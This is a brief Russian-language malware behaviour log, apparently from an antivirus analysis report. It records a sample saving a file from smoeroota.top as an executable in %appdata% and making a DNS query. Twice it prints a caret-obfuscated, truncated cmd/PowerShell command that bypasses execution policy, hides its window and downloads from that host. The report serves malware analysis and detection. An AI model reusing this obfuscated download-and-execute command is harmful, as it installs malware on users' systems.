Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^weRsh^ELl.^Exe -ExecuTiO^npOl^i^C^y B^yP^aSs^ ^-No^PRof^i^L^e -W^in^DOWS^TyL^e hI^Dden (NeW^-objec^T SyS^tE^m.^Net.w^E^bClienT^).d^o^w^NLO^ADfI^LE(^'http://smoeroota.top/read.ph...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "PO^weRsh^ELl.^Exe -ExecuTiO^npOl^i^C^y B^yP^aSs^ ^-No^PRof^i^L^e -W^in^DOWS^TyL^e hI^Dden (NeW^-objec^T SyS^tE^m.^Net.w^E^bClienT^).d^o^w^NLO^ADfI^LE(^'http://smoeroota.top/read.ph...' (со скрытым окном)